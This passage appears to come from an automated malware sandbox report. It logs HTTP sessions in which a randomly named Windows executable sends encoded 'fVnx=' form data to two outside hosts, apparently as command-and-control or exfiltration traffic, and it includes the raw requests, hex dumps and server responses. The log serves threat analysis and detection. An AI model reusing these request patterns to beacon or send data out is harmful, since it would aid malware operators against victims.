                                                        Origin: http://www.promocao.info
                                                        Cache-Control: max-age=0
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.promocao.info/zaz4/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 33 46 4c 2b 4b 54 6c 6b 33 63 56 42 62 59 46 65 6a 65 68 44 6d 45 4e 59 53 76 63 50 31 6b 70 68 31 6d 30 47 33 44 77 35 78 31 67 7a 67 4e 6f 2f 6e 4b 39 59 57 5a 31 30 77 42 4a 31 79 73 66 2f 46 52 6a 31 52 64 74 6e 52 6b 4e 31 32 49 62 2b 71 54 41 34 64 68 7a 76 53 38 63 4b 42 71 46 4b 63 2b 62 4c 74 4c 63 77 47 55 4c 30 7a 64 59 33 73 43 43 64 35 5a 41 4a 39 72 49 75 51 59 54 69 70 55 4a 5a 57 6c 52 49 4a 51 76 50 6c 44 77 45 42 35 55 6d 2b 2b 75 32 41 32 56 64 2b 79 42 55 59 70 59 74 33 70 44 31 6a 70 59 42 50 4d 64 53 57 41 7a 77 68 78 47 62 58 43 37 36 35 63 69 46 6a 32 52 7a 6f 64 36 47 39 69 4d 65 45 36 5a 39 71 39 36 59 54 32 5a 49 6d 55 68 51 61 47 4f 33 6e 69 55 6b 30 6b 76 52 6e 6a 51 5a 76 70 33 2b 63 75 33 7a 4c 4c 73 7a 48 4c 75 6d 69 2f 70 49 4b 64 77 6f 33 45 52 35 47 36 64 56 37 2f 53 35 6b 34 79 52 70 42 74 32 50 67 33 37 2f 6f 4d 39 33 5a 7a 6c 41 69 37 53 6d 46 52 62 35 70 64 65 31 56 72 2f 47 69 6e 71 5a 4a 66 51 43 4c 4e 75 [TRUNCATED]
                                                        Data Ascii: fVnx=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1kph1m0G3Dw5x1gzgNo/nK9YWZ10wBJ1ysf/FRj1RdtnRkN12Ib+qTA4dhzvS8cKBqFKc+bLtLcwGUL0zdY3sCCd5ZAJ9rIuQYTipUJZWlRIJQvPlDwEB5Um++u2A2Vd+yBUYpYt3pD1jpYBPMdSWAzwhxGbXC765ciFj2Rzod6G9iMeE6Z9q96YT2ZImUhQaGO3niUk0kvRnjQZvp3+cu3zLLszHLumi/pIKdwo3ER5G6dV7/S5k4yRpBt2Pg37/oM93ZzlAi7SmFRb5pde1Vr/GinqZJfQCLNuNFSIcdf816rTh3QUbGE0d+1We926tPl5pMAieu1ATh6VqUC2HPxsXc9xoN7cqzB7o96gcXFbr2IvQtKBIcCb7nBw2SjcbIHR5FJi897GEdyAfzDQn53Fub2v4a8RZb5exBMslAEbjYzezbpQ6F4PRbAMKCY4SPMhe61VebSB1iFUx/ESt9IWT7bx3lSfvQaacY77ax+Fku6hfBlwnuEue3zPxv9IyzEPu7nVGoZa5qi1wIp3IeXpt2FRhJXIdw+8AHbJ5mjHNFh2d4cgdW+r0o6D0xdqEax/eT6CqcvFuPUNdGDxvX052SHWirTJZHwTX5FU21ASc6PXIfINxqajzSE8vzBuYzFRj+uNZ8GJd5EDQJeeEoyY0D+AMxrVSaa9j/3NKDVrBiUrCyLhGcDq+kLv6R/l5qPCzsGVjE4TgrUNXa6FMPLsUTOS2L832APYOI7BkKjROnWSg2XK1HrXygq43xkfSp4FAbLihHcth8FCcji2Q3+VtXP7IcWXYdq9ZFteoENzxxaq/TpI958L3MGe62WFiYt5c4ZcQLJ4CFJGqO96t4+NRFlibEoFBXVE/XSk1sRy1B8y5mirqe+AKUwxN5sPjIsk1YTM3qx1SVyGcr5PNSBKQBRVYatGlVfedJK1mCAZTXDYngvTQJduOLwKf5FjQ5Muec [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.64998884.32.84.32804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:43:49.223737001 CET485OUTGET /zaz4/?fVnx=a/HH2smDyRg6YmpNlpDSiGBzLdYAcGrERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9MtzddvEJa00pgxMS/8uYz9VBXNTWbWf/uKLTh5jUQ9SsZ4eSETpRQQJc=&XLc=1bXtqxM HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.promocao.info
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Jan 16, 2025 00:43:49.681005955 CET1236INHTTP/1.1 200 OK
                                                        Date: Wed, 15 Jan 2025 23:43:49 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 9973
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Server: hcdn
                                                        alt-svc: h3=":443"; ma=86400
                                                        x-hcdn-request-id: 253e30de10e9e6eb3655487ca5f7f97b-bos-edge3
                                                        Expires: Wed, 15 Jan 2025 23:43:48 GMT
                                                        Cache-Control: no-cache
                                                        Accept-Ranges: bytes
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                        Jan 16, 2025 00:43:49.681041002 CET224INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                        Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30
                                                        Jan 16, 2025 00:43:49.681054115 CET1236INData Raw: 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74 2d
                                                        Data Ascii: px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:0
                                                        Jan 16, 2025 00:43:49.681077003 CET1236INData Raw: 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f 72
                                                        Data Ascii: lign:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px;
                                                        Jan 16, 2025 00:43:49.681092024 CET1236INData Raw: 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30
                                                        Data Ascii: align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{disp
                                                        Jan 16, 2025 00:43:49.681108952 CET1236INData Raw: 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 65 6e 2f 20 72 65 6c 3d 6e 6f 66 6f
                                                        Data Ascii: cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidden=true class
                                                        Jan 16, 2025 00:43:49.681123018 CET896INData Raw: 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69
                                                        Data Ascii: f=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any
                                                        Jan 16, 2025 00:43:49.681191921 CET892INData Raw: 6f 64 65 3d 6e 65 77 20 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b
                                                        Data Ascii: ode=new function(){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 seq
                                                        Jan 16, 2025 00:43:49.681205988 CET1236INData Raw: 28 63 3d 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2d 22 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b 6d 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 36 35
                                                        Data Ascii: (c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeE
                                                        Jan 16, 2025 00:43:49.681221008 CET884INData Raw: 2b 2b 64 29 68 3c 3d 28 43 3d 74 5b 64 5d 29 26 26 43 3c 6c 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69 2b 31 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63
                                                        Data Ascii: ++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.649991104.21.18.171804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:43:54.736316919 CET741OUTPOST /kxtt/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.grimbo.boats
                                                        Origin: http://www.grimbo.boats
                                                        Cache-Control: max-age=0
                                                        Content-Length: 209
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.grimbo.boats/kxtt/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 54 41 64 49 41 50 49 65 4a 46 78 68 37 77 52 31 79 41 63 50 75 4a 6e 52 62 4b 78 77 39 7a 76 47 34 4a 48 33 37 70 54 46 45 38 44 57 76 50 2f 48 34 6f 72 75 47 59 46 51 52 56 6c 6a 4f 62 71 74 74 70 47 6d 31 79 6a 33 58 42 70 4b 52 2f 30 4f 65 51 30 38 74 78 42 31 4d 73 49 30 6d 6a 35 42 47 77 63 59 73 61 7a 66 32 7a 61 75 48 6c 49 6c 39 39 58 53 36 66 73 72 53 6b 51 73 30 75 45 63 67 58 36 30 5a 4b 47 56 75 4d 73 77 64 7a 6d 58 36 57 6e 53 4f 77 35 4a 65 6f 32 37 7a 58 6d 72 34 73 51 30 4f 42 6f 75 7a 79 44 53 76 39 48 45 6b 79 34 48 53 51 58 52 6d 56 62 4d 4e 74 4b 30 38 34 79 4b 72 38 66 76 68 4a 59 6a
                                                        Data Ascii: fVnx=TAdIAPIeJFxh7wR1yAcPuJnRbKxw9zvG4JH37pTFE8DWvP/H4oruGYFQRVljObqttpGm1yj3XBpKR/0OeQ08txB1MsI0mj5BGwcYsazf2zauHlIl99XS6fsrSkQs0uEcgX60ZKGVuMswdzmX6WnSOw5Jeo27zXmr4sQ0OBouzyDSv9HEky4HSQXRmVbMNtK084yKr8fvhJYj
                                                        Jan 16, 2025 00:43:55.444884062 CET1088INHTTP/1.1 404 Not Found
                                                        Date: Wed, 15 Jan 2025 23:43:55 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        vary: accept-encoding
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dhi5Anz1sVxRqsBBqutBVNpg9mX3RytAJhsAyyjo%2Bc7CSGg55RsL%2FXBSpzRtzOoLiDKz4guLreuWBjqI4P0y5OQC4440LrTw9OeUBgEtVm2Vo79tr7cz3CY40HDwVu01KqaW"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9029bb11cdf4ac4e-YYZ
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=14150&min_rtt=14150&rtt_var=7075&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=741&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.649992104.21.18.171804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:43:57.287763119 CET765OUTPOST /kxtt/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.grimbo.boats
                                                        Origin: http://www.grimbo.boats
                                                        Cache-Control: max-age=0
                                                        Content-Length: 233
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.grimbo.boats/kxtt/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 33 57 73 76 50 48 71 63 66 75 44 59 46 51 4a 46 6c 6d 52 4c 71 69 74 70 4b 75 31 32 72 33 58 42 39 4b 52 36 49 4f 64 6a 4d 2f 73 68 42 33 4e 63 49 32 6c 54 35 42 47 77 63 59 73 61 6d 34 32 7a 69 75 48 57 51 6c 38 59 6a 56 7a 2f 73 6b 56 6b 51 73 2b 4f 45 51 67 58 37 54 5a 4c 71 2f 75 4a 77 77 64 7a 57 58 36 6e 6e 64 41 77 34 43 51 49 33 6b 6c 58 58 33 78 61 64 54 50 51 45 71 6f 41 72 74 75 4c 61 65 34 42 34 6b 41 41 33 54 6d 58 44 2b 4e 4e 4b 65 2b 34 4b 4b 35 72 54 49 75 39 39 41 74 4d 43 6b 58 33 79 66 4f 37 35 69 62 32 6d 47 4b 6d 61 42 6d 41 3d 3d
                                                        Data Ascii: fVnx=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEO3WsvPHqcfuDYFQJFlmRLqitpKu12r3XB9KR6IOdjM/shB3NcI2lT5BGwcYsam42ziuHWQl8YjVz/skVkQs+OEQgX7TZLq/uJwwdzWX6nndAw4CQI3klXX3xadTPQEqoArtuLae4B4kAA3TmXD+NNKe+4KK5rTIu99AtMCkX3yfO75ib2mGKmaBmA==
                                                        Jan 16, 2025 00:43:58.000288010 CET1096INHTTP/1.1 404 Not Found
                                                        Date: Wed, 15 Jan 2025 23:43:57 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        vary: accept-encoding
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2B%2BoaOmOxdREj376ijmXs9r%2Bbfzo9F2fUcb5eNdoG8a0ubCqm%2FlJyaE9Vb8dMtq9uOXo0jlf83Cx0le%2F16gBZ6Ld5I9ZxfkLp0lAbZWyDDP5Q8pjydtO5fPb5%2FmNCZr9iZnA"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9029bb21beaaaa9e-YYZ
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=13897&min_rtt=13897&rtt_var=6948&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.649993104.21.18.171804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:43:59.835611105 CET1778OUTPOST /kxtt/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.grimbo.boats
                                                        Origin: http://www.grimbo.boats
                                                        Cache-Control: max-age=0
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.grimbo.boats/kxtt/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 54 41 64 49 41 50 49 65 4a 46 78 68 30 78 68 31 33 6a 30 50 70 70 6e 53 48 61 78 77 6b 44 76 4b 34 4a 4c 33 37 72 2f 7a 45 4f 50 57 76 65 76 48 34 4c 44 75 45 59 46 51 58 56 6c 6e 52 4c 71 46 74 71 36 71 31 32 76 6e 58 43 46 4b 65 2f 45 4f 57 79 4d 2f 6c 68 42 33 47 38 49 31 6d 6a 34 4a 47 77 4d 63 73 61 32 34 32 7a 69 75 48 51 38 6c 37 4e 58 56 31 2f 73 72 53 6b 51 67 30 75 45 38 67 58 79 73 5a 4c 66 4b 75 64 38 77 64 54 47 58 70 46 2f 64 4d 77 34 41 54 49 33 73 6c 58 62 65 78 63 35 31 50 51 41 4d 6f 41 66 74 69 50 79 48 76 41 49 34 62 77 72 49 2f 41 7a 62 45 49 44 6f 2b 4c 71 4c 2b 39 62 6b 6e 38 46 4a 6a 35 36 77 63 47 62 74 4a 35 46 35 43 77 50 56 45 6c 4c 73 77 71 4e 48 33 42 7a 32 39 6a 53 73 54 39 64 4b 4b 50 74 59 58 62 35 2f 47 36 63 45 45 48 51 34 75 53 75 4b 75 33 41 51 38 49 76 68 72 76 43 56 36 6a 53 66 35 64 63 35 68 49 6d 53 6e 2b 78 32 33 31 58 44 37 54 31 6e 33 67 74 48 36 35 36 31 37 66 78 5a 6b 78 31 73 44 4b 42 51 2f 71 78 41 61 39 6d 4f 78 31 43 31 34 33 38 6b 58 [TRUNCATED]
                                                        Data Ascii: fVnx=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEOPWvevH4LDuEYFQXVlnRLqFtq6q12vnXCFKe/EOWyM/lhB3G8I1mj4JGwMcsa242ziuHQ8l7NXV1/srSkQg0uE8gXysZLfKud8wdTGXpF/dMw4ATI3slXbexc51PQAMoAftiPyHvAI4bwrI/AzbEIDo+LqL+9bkn8FJj56wcGbtJ5F5CwPVElLswqNH3Bz29jSsT9dKKPtYXb5/G6cEEHQ4uSuKu3AQ8IvhrvCV6jSf5dc5hImSn+x231XD7T1n3gtH65617fxZkx1sDKBQ/qxAa9mOx1C1438kXUyJFQai1icNYjKfCK1gYUSDhK+lyIp9wuxvzHPIFB3iBCF+hFQVhgpUY/wflJo83Bp60CJgg5TCKmkQIbRMU8kyXWb2QsrH/F02/Z6k1uEcd+/sVT5AM+bRzEeHB2SW6bUy34BjGBnIr5MnpE/awyg5mIfMJHzuNB/nrQfxom07mttvMmuDxsUz8GhE07VO8D5oGOZFuUhEp8pRVUZJ64FlvKguDKTjcWrJV9s9GUPbUdBUXogfl3q2TrK5VhS+GnMt56sJy3rwRtqr7gj9S4xpCFwXOg86066m4NxfMs4qWuFCBYJhdgITxmz6NwH2ZaDA/kG5nodoac+Yd7ETjMwR6+yO+IDWliM91CkbHQq1sNoqTIzBWpRCUvUeBib0nxw0WiyxgFGmuRMkBhA8EcR5WZWRTSJ2VAeilqD7Z/qT3s7r/JQy50u1s3P+c+xt0vDp2OP1DdaCIAaGqu3kIGeSDNbK0FxQnLnM0HOFkHksWPVHSvTt0dSFAosX4SNrC4booc/ga7zboDconzTBIXJgxAHMLJd6MMt/n1cUVuMGmXs7Wkr4LDbYmYTOwEHuk92PmnrJ16p7q3gWH0gSxtT61e69LQI2zeGXDQupj8fUNmngNq5/+QJtDd0UebY8XwXrPifpHava5JD6ovtCcQBg8i1X+V4nA4y [TRUNCATED]
                                                        Jan 16, 2025 00:44:00.492429018 CET1087INHTTP/1.1 404 Not Found
                                                        Date: Wed, 15 Jan 2025 23:44:00 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
